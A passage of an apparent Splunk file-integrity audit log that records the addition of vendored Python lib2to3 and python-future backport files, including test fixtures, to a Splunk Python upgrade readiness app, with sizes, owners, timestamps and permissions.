action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/different_encoding.py", isdir=0, size=230, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.427, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/crlf.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.423, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/bom.py", isdir=0, size=37, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.419, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data/README", isdir=0, size=404, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.315, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/test_util.py", isdir=0, size=21245, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.311, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/test_refactor.py", isdir=0, size=11890, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.307, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/test_pytree.py", isdir=0, size=17308, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.304, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/test_parser.py", isdir=0, size=11680, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.300, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/test_main.py", isdir=0, size=6217, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.296, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/test_fixers.py", isdir=0, size=120139, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.292, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/test_all_fixers.py", isdir=0, size=517, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.288, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/support.py", isdir=0, size=1742, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.285, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/pytree_idempotency.py", isdir=0, size=2385, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.281, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.277, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests/__init__.py", isdir=0, size=673, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.173, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/tokenize.py", isdir=0, size=19244, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.169, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/token.py", isdir=0, size=1257, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.166, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/pgen.py", isdir=0, size=13826, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.161, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/parse.py", isdir=0, size=8053, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.155, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/literals.py", isdir=0, size=1614, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.151, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/grammar.py", isdir=0, size=6594, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.146, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/driver.py", isdir=0, size=6041, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.142, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/conv.py", isdir=0, size=9627, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.137, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2/__init__.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.133, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.128, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/refactor.py", isdir=0, size=28067, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.124, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pytree.py", isdir=0, size=29039, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.119, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pygram.py", isdir=0, size=1158, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.115, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/pgen2", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.109, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/patcomp.py", isdir=0, size=7065, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.105, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/main.py", isdir=0, size=11605, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.101, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.097, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixer_util.py", isdir=0, size=14597, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.092, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/fixer_base.py", isdir=0, size=6780, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.087, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/btm_utils.py", isdir=0, size=10012, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.081, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/btm_matcher.py", isdir=0, size=6834, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.076, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/__main__.py", isdir=0, size=67, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.073, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/__init__.py", isdir=0, size=7, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.068, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/PatternGrammar2.7.17.final.0.pickle", isdir=0, size=2799, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.064, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/PatternGrammar2.7.16.final.0.pickle", isdir=0, size=2799, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.059, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/PatternGrammar2.7.15.final.0.pickle", isdir=0, size=2799, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.055, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/PatternGrammar.txt", isdir=0, size=793, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.049, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/Grammar2.7.17.final.0.pickle", isdir=0, size=40486, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.044, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/Grammar2.7.16.final.0.pickle", isdir=0, size=40486, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.040, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/Grammar2.7.15.final.0.pickle", isdir=0, size=40486, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:44.036, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/lib2to3/Grammar.txt", isdir=0, size=7094, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.831, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newstr.py", isdir=0, size=15464, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.827, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newrange.py", isdir=0, size=5195, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.823, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newopen.py", isdir=0, size=810, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.818, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newobject.py", isdir=0, size=3339, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.811, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newmemoryview.py", isdir=0, size=654, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.804, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newlist.py", isdir=0, size=2284, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.797, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newint.py", isdir=0, size=13233, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.792, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newdict.py", isdir=0, size=3100, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.788, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/newbytes.py", isdir=0, size=16238, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.784, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/types/__init__.py", isdir=0, size=6831, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.680, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/http/server.py", isdir=0, size=45523, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.677, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/http/cookies.py", isdir=0, size=21569, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.673, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/http/cookiejar.py", isdir=0, size=76542, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.669, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/http/client.py", isdir=0, size=47192, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.663, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/http/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.557, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/urllib/robotparser.py", isdir=0, size=6865, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.553, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/urllib/response.py", isdir=0, size=3180, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.549, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/urllib/request.py", isdir=0, size=96184, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.545, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/urllib/parse.py", isdir=0, size=35792, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.541, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/urllib/error.py", isdir=0, size=2715, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.537, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/urllib/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.532, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/xmlrpc/server.py", isdir=0, size=37285, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.528, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/xmlrpc/client.py", isdir=0, size=48133, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.523, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/xmlrpc/__init__.py", isdir=0, size=38, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.418, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/support.py", isdir=0, size=70881, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.414, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/ssl_servers.py", isdir=0, size=7209, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.410, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/ssl_key.pem", isdir=0, size=916, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.406, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/ssl_key.passwd.pem", isdir=0, size=963, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.401, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/ssl_cert.pem", isdir=0, size=867, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.398, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/sha256.pem", isdir=0, size=8344, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.394, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/pystone.py", isdir=0, size=7427, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.389, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/nullcert.pem", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.384, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/nullbytecert.pem", isdir=0, size=5435, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.380, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/nokia.pem", isdir=0, size=1923, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.376, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/keycert2.pem", isdir=0, size=1795, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.369, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/keycert.pem", isdir=0, size=1783, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.364, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/keycert.passwd.pem", isdir=0, size=1830, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.358, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/https_svn_python_org_root.pem", isdir=0, size=2569, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.353, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/dh512.pem", isdir=0, size=402, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.347, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/badkey.pem", isdir=0, size=2162, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.343, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/badcert.pem", isdir=0, size=1928, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.339, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/test/__init__.py", isdir=0, size=264, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.235, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/html/parser.py", isdir=0, size=19770, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.231, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/html/entities.py", isdir=0, size=75428, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.225, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/html/__init__.py", isdir=0, size=924, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.120, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/text.py", isdir=0, size=1552, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.116, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/nonmultipart.py", isdir=0, size=832, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.112, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/multipart.py", isdir=0, size=1699, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:43.109, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/future/backports/email/mime/message.py", isdir=0, size=1429, gid=41812, uid=41812, 